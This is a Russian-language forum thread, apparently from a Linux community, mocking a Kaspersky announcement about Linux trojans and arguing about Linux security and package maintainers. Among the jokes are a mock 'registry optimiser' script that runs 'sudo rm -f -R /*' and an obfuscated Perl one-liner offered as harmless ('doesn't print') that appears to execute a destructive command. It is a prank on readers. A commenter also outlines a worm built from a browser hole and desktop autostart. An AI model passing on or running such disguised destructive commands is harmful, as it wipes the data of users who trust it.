баян и херня полная

Боян? Можно ссылку?

такие ещё 15ть лет назад писали. так что боян древнючий.

// wbr

>Файл расшифровывает Perl-скрипт

А запустился он с помощью магии, ага :}

Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

http://breys.ru/blog/279.html

Ъ в пролёте

Я уже вчера ночью там нафлеймил, настроение плохое было

А как ещё рекламироваться то? Удивляет,что за столько лет сия контора ничего работающего не написала.

Я тут подумал, такой вирус даже я осилю написать!

Но мне более интересны вирусы старой закалки. Как правило, писанные на ассемблере, они встраивались в код других программ и запускались до исполнения основного программного кода. Это как пример. Вот на такое у меня пока знаний не хватит.

--Издевающимся тоном--
Что, продажи на нуле?!! (((:

В линуксах вирусам не хватает только одного - возможности автозапуска. Хотя может это предоставляют всякие вэб приложения?

А так вредоносной программе достаточно, например, нагадить в ~/.local/icons - и жизнь пользователя испорчена :)

>В линуксах вирусам не хватает только одного - возможности автозапуска

А как же распространение по сети?

Хотя да, вирус != червь

> Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

А ты всегда знаешь, что запускаешь вместе с вытянутой из интернета программой? Всякие там closed-source игры и прочие поделки? Ты хотя бы контрольные суммы проверяешь после скачивания? ;)

По той ссылке ниже есть http://habrahabr.ru/blogs/infosecurity/59828/ - порвало просто :)))

Не качаю из левых мест.

Шо опять?

У касперского очередное полугодичное обострение.

Цитата с комментов:

19.05.2009 03:52:04
Опять Кашмарский взялся за старое...

Уж сколько раз твердили Жене,
Что, накурившись всякой хрени,
Не суйся в лагерь линуксят -
Они с говном тебя съедят!

> Не суйся в лагерь линуксят -
> Они с говном тебя съедят!

простите, а именно с говном - это обязательное условие?

ps: AFAIR даже аборигены, уж на что дикий народ, и те съели Кука без соли конечно и без лука, но и без участия столь экстравагантных приправ.

// wbr

слухи о безопасности *nix систем сильно преувеличены.

и вообще по мере популяризации линукса будут появляться все новые и новые вирусы. это ясно как божий день.

угу, уже сейчас сотни и тысячи ботов сканят 22-е порты и подбирают пароли admin/admin, root/root, root/qwerty и т.д - И НАХОДЯТ ЖЕ. иначе разновсяческих спамеров и ботнетов было бы в разы меньше.

и вывод сделан в корне неверно. не "время безопасности никсов прошло", а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

обнаруженные^W написанные fixed

> время грамотных админов прошло

скорее уже "время неграмотных админов прошло" или "время грамотных админов пришло". имхо.

[толсто] Раб касперского

subj. fixed.

Шо и ебюлды по ссылке? Да неужели а! А то сколько пробую неродные так они в wine не заводятся.

И что они будут делать на системе без Perl'а?

И что с этими троянами будет, если их не запускать?

...

А так - можно подумать, это первые или последние трояны/черви под Linux... Самопиар, короче, очередной :)

Кашперский беспокоится. О своих карманах. Кризис ведь.

слухи о безопасности Касперского сильно преувеличены.

>Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.
Я еще понимаю на вин домохозяйки будут доп. левые программы скачивать. Плееры, офисы, А тут что? Всё же в пакетах! Резону нет им что либо экзекутаебальное искать.

Вирус не червь, но червь вирус.

>Хотя да, вирус != червь

Не всякий вирус червь, но всякий червь -- вирус.

однако написать реального червя вполне реально. Достаточно найти уязвимость в каком-нибудь популярном браузере (тот же фуррифокс), позволяющую создавать/редактировать файлы пользователя. Через нее положить скрипт куда-нибудь поглубже и сделать автозапуск от юзера (что для всяких ДЕ делается элементарно). Ну и собственно готов еще один бот :)

Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

просто разместить ссылку на лоре?

// wbr

>> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?
> просто разместить ссылку на лоре?

да, и, конечно же, не забыть указать, что по ссылке - троян.

// wbr

>а как остальных заставить перейти на вредоносную страницу с трояном?

зачем заставлять - сами зайдут. Леммингов, посещающих различные сомнительные сайты и бездумно открывающих ссылки всегда хватает. Особенно среди пользователей всяких бубунт.

>Мифы о полной защищенности *nix-систем постепенно уходят в прошлое

Кажется они собрались портировать своё тупое поделие под линукс.

Бугога.
"Вирусы" из серии "rm".

#!/bin/sh

echo "Сейчас скрипт оптимизирует ваш реестр, для этого Вас попросят ввести пароль."
sudo rm -f -R /*

Зачет! :)))

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

- не печатает

Ждем троянов в виде апплетов для gnome/kde. Это, наверно, одна из самых больших помоек. Плюс еще инит-скрипты (но тут нужны права рута). Вроде бы есть трояны в виде плагинов для фокса...

Хорошая новость в том, что SELinux такого рода программы элементарно вычислит.

поздравляем касперыча с выходом из анабиоза

> а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

А что грамотный админ сделает в случае скрипта на перле, который, например, эксплоитит этот перл и выдает рута (как это было несколько лет назад)? И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

>И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

даже не думаю - уверен, что в подавляющем большинстве случаев - нет, не подозревают. если собралась - хорошая программа. если не собралась - плохая. вот и весь селект.

// wbr

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

В любом случае, ментейнер не скачает прогу с левого сайта, и хотя бы на глазок посмотрит что там в нутрях. Тем более есть железный вариант - использовать стабильные ветки дистров. А если ставишь проги с непроверенных источников, то ССЗБ.

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

Угу, а потом, когда крик поднимется, автору коммита серпом по яйцам ррраз. Найди мне такого смелого вирусописателя. Плюс, стабильные ветки дистрибов только секурные и багфисные патчи накладывают в обновлениях, а бэкпортов не так много и, подозреваю, там серьезно относятся.

> А если ставишь проги с непроверенных источников, то ССЗБ.

(kde|gnome)-look.org - это проверенный или непроверенный источник?